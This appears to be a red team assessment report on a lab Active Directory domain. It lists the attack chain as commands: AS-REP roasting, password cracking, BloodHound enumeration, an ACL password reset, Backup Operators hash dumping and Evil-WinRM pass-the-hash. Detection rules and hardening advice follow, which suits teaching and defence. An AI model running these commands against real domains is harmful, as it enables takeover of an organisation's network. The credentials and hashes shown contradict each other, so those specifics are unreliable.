RedTeam Assessment Report

Red Team Assessment Report

Target Domain: ignite.local

Assessment Type: Internal Red Team Engagement

Date: 17/06/2025

Conducted By: [Red Team Operator Name / Organiza�on]

 RedTeam Assessment Report

Executive Summary
This red team assessment simulated an internal threat actor targe�ng the Ac�ve Directory
environment of ignite.local. The engagement iden�fied mul�ple vulnerabili�es that enabled lateral
movement and privilege escala�on, culmina�ng in full Domain Administrator access. These included
misconfigura�ons related to Kerberos authen�ca�on, weak password hygiene, excessive privileges,
and ineffec�ve monitoring.

Attack Path Overview

The red team leveraged a series of chained atack techniques to gain domain dominance:

1. AS-REP Roas�ng was used to extract encrypted Kerberos TGT hashes from accounts without pre-
authen�ca�on enabled.
2. Offline Password Cracking revealed valid user creden�als.
3. Ac�ve Directory Enumera�on uncovered misconfigured ACLs.
4. Abuse of Password Reset Privileges enabled access to another user account.
5. Privilege Escala�on via Backup Operators allowed extrac�on of the Administrator account hash.
6. Remote Access as Domain Admin was achieved using Evil-WinRM.

Detailed Technical Workflow

Credential Access via AS-REP Roasting
impacket-GetNPUsers -dc-ip 192.168.1.53 ignite.local/ -usersfile users.txt -format
john -outputfile hashes

Offline Password Cracking

john -w=/usr/share/wordlists/rockyou.txt hashes

Active Directory Enumeration

bloodhound-python -u komal -p Password@1 -ns 192.168.1.53 -d ignite.local -c All
 RedTeam Assessment Report

BloodHound Atack Path Diagram

We’ll generate a BloodHound atack path diagram from:
• User komal ➝ ACL Abuse ➝ Reset Password of raj ➝ Backup Operators ➝ Dump Hashes
or move laterally ➝ Admin
• User raj ➝ Compromised Admin via Evil-WinRM + NTLM Hash
This will be visualized as a path graph:
• Start node: komal
• End node: Domain Admin
• With privilege nodes such as GenericAll, ResetPassword, MemberOf, etc.

Abuse of ACLs for Password Reset

bloodyAD --host 192.168.1.53 -d ignite.local -u komal -p yyyyyy123 set password
raj xxxxxxx123

1. Privilege Escala�on through Backup Operators

nxc smb 192.168.1.53 -u raj -p xxxxxxx123 -M backup_operator

2. Domain Admin Access via Evil-WinRM

 RedTeam Assessment Report

evil-winrm -i 192.168.1.53 -u administrator -H 32196b56ffe17b91a83bf38

MITRE ATT&CK Mappings

Technique ID Description
Account Discovery T1033 Enumerated domain users and groups
AS-REP Roasting T1558.004 Retrieved TGT hashes for offline
cracking
Password Cracking T1110.002 Used John the Ripper to recover
plaintext credentials
Account Manipulation T1098 Abused ACL to reset user password
Valid Accounts T1078 Used legitimate credentials to log in
OS Credential Dumping T1003.003 Extracted NTLM hash of Administrator
(NTDS)
Remote Services (WinRM) T1021.006 Used Evil-WinRM for remote execution
as Administrator
 RedTeam Assessment Report

Detection Opportunities
Activity Source Event ID / Artifact Detection Strategy

AS-REP Roasting Kerberos Logs Unusual AS-REQ Monitor for AS-REQ without pre-
traffic auth

BloodHound LDAP/Security High LDAP query Alert on unusual LDAP

Enumeration Logs volume enumeration patterns

Password Reset via Security Logs Event ID 4723 Detect non-admin users
ACL performing password resets

NTDS.dit / SYSTEM File Access Logs 5145 or Sysmon Monitor access to critical files like
access FileCreate SAM/NTDS.dit

WinRM Sessions PowerShell / 4104, 4688 Alert on WinRM logons from

Sysmon unusual sources

Detection Engineering – MITRE Mapped

1. AS-REP Roasting Detection
Technique: Creden�al Access – T1558.004 – AS-REP Roas�ng
Data Source: Windows Security Logs (Domain Controllers)
Relevant Event ID: 4768 (Kerberos AS-REQ)

Detec�on Logic:
AS-REP Roas�ng targets Kerberos accounts that do not require pre-authen�ca�on. Atackers use
tools such as GetNPUsers.py to request AS-REQs that return encrypted creden�als which can be
cracked offline.

Key Indicators:

• Kerberos authen�ca�on requests using Encryp�onType: 0x17 (RC4-HMAC)

• Absence of PreAuthType in Event ID 4768

• No follow-up TGT issuance (4769)

Example SIEM Rule (Sigma Style):

yaml

CopyEdit
event.code: 4768 AND
winlog.event_data.TicketEncryptionType: "0x17" AND
NOT winlog.event_data.PreAuthType: *
Mi�ga�on/Detec�on Strategy:

• Alert on AS-REQs for users with Do not require Kerberos pre-authen�ca�on enabled.
 RedTeam Assessment Report

• Periodically audit Ac�ve Directory for accounts with DONT_REQ_PREAUTH flag.

• Implement anomaly detec�on for spikes in 4768 logs with RC4 encryp�on.

2. Password Cracking (Offline)

Technique: Creden�al Access – T1110.002 – Password Cracking
Data Source: External (Offline atack)

Detec�on Logic:
While password cracking is performed offline and does not generate logs on the domain controller,
prior access to creden�al material (e.g., AS-REP hashes) can be monitored.

Mi�ga�on/Detec�on Strategy:

• Monitor for use of password spraying or brute-force tools internally.

• Use Honeytoken accounts configured without pre-auth to trigger AS-REQ alerts.

3. Active Directory Enumeration (BloodHound)

Techniques:

• Discovery – T1018 – Remote System Discovery

• Discovery – T1482 – Domain Trust Discovery

Data Source: LDAP Logs, Security Logs, Network telemetry
Relevant Event IDs: 4662, 1644

Detec�on Logic:
BloodHound uses LDAP enumera�on to query large sets of AD objects (sessions, ACLs, groups). Non-
administra�ve users genera�ng such queries is anomalous.

Key Indicators:

• Unusual LDAP query volume (Event ID 1644) from standard worksta�ons

• Search requests with high objectCount

• Accesses to sensi�ve atributes like msDS-AllowedToActOnBehalfOfOtherIden�ty

Sigma-style Example:

yaml

CopyEdit
event.code: 1644 AND
ldap.operation: "SearchRequest" AND
ldap.objectCount > 1000 AND
source.user.name NOT IN ["Domain Admins", "Service Accounts"]
Mi�ga�on/Detec�on Strategy:

• Enable verbose LDAP logging.

• Monitor endpoints for SharpHound.exe, bloodhound-python, or similar binaries.

 RedTeam Assessment Report

4. Account Manipulation via ACL Abuse

Technique: Privilege Escala�on – T1098 – Account Manipula�on
Data Source: Security Logs
Relevant Event IDs: 4723, 4724, 4738

Detec�on Logic:
Atackers can use ACL misconfigura�ons (e.g., GenericAll, ResetPassword) to manipulate accounts
and reset passwords without needing the original creden�als.

Key Indicators:

• 4724: An account was reset by another user

• 4738: Account modified without a corresponding �cket

SIEM Detec�on Example:

yaml

CopyEdit
event.code: 4724 AND
winlog.event_data.SubjectUserName NOT IN ["Helpdesk", "ITAdmin"] AND
winlog.event_data.TargetUserName: "raj"
Mi�ga�on:

• Regularly audit ACL permissions using tools like BloodHound.

• Alert on non-administra�ve users rese�ng passwords of other accounts.

5. Abuse of Backup Operators Group

Technique: Privilege Escala�on / Defense Evasion
Data Source: Security Logs, File Access Audi�ng
Relevant Event IDs: 4670, 4663, 5145

Detec�on Logic:
The Backup Operators group allows reading sensi�ve files (e.g., NTDS.dit, SAM). This can be abused
to extract hashes or registry hives.

Key Indicators:

• Membership changes to Backup Operators

• Access to C:\Windows\NTDS\ntds.dit, SAM, or System files

• Shadow copy crea�on commands (e.g., vssadmin, wbadmin)

Example Detec�on Rule:

yaml

CopyEdit
event.code: 4663 AND
winlog.event_data.ObjectName IN ["C:\\Windows\\NTDS\\ntds.dit",
"C:\\Windows\\System32\\config\\SAM"]
 RedTeam Assessment Report

6. Remote Admin Access via Evil-WinRM

Technique: Lateral Movement – T1021.006 – Remote Services: WinRM
Data Source: Windows Logs, PowerShell Logs, Network Traffic
Relevant Event IDs: 4624, 4688, 4104

Detec�on Logic:
Evil-WinRM establishes WinRM sessions over port 5985/5986. Successful logons by previously non-
privileged accounts using NTLM hashes is a red flag.

Key Indicators:

• Type 3 logon with new local Administrator session (Event ID 4624)

• WinRM/WSMan-related commands

• Execu�on of suspicious scripts post logon

SIEM Rule Example:

yaml

CopyEdit
event.code: 4624 AND
winlog.event_data.LogonType: 3 AND
winlog.event_data.TargetUserName: "administrator"
Mi�ga�on:

• Limit use of WinRM and monitor logs for elevated access via NTLM.

• Require Kerberos for remote authen�ca�on where possible.

 RedTeam Assessment Report

Recommendations
Identity & Authentication
- Enforce Kerberos pre-authen�ca�on for all user accounts.
- Review and apply strong password policies.
- Implement MFA for administra�ve accounts wherever feasible.

Privilege Management
- Audit and limit delegated permissions using tools like BloodHound.
- Remove users from Backup Operators group unless strictly required.

Logging & Monitoring

- Enable detailed audi�ng for LDAP queries, PowerShell execu�ons, and remote logins.
- Integrate logs with a SIEM for behavioral analy�cs.

Infrastructure Hardening
- Implement Local Administrator Password Solu�on (LAPS).
- Restrict and monitor usage of WinRM and other remote management interfaces.
- Regularly review group memberships and ACLs using automated tools.

Appendix
Cracked User Creden�als:
- komal : Password
- raj : Password

Administrator NTLM Hash:

32196b56ffe6f45e29888889

Conclusion
This assessment successfully demonstrated how a combina�on of weak authen�ca�on se�ngs, over-
permissive ACLs, and poor privilege management could lead to a complete Ac�ve Directory domain
compromise. The issues discovered highlight cri�cal gaps in hardening and monitoring prac�ces that
must be addressed to improve the organiza�on’s overall security posture.
 JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in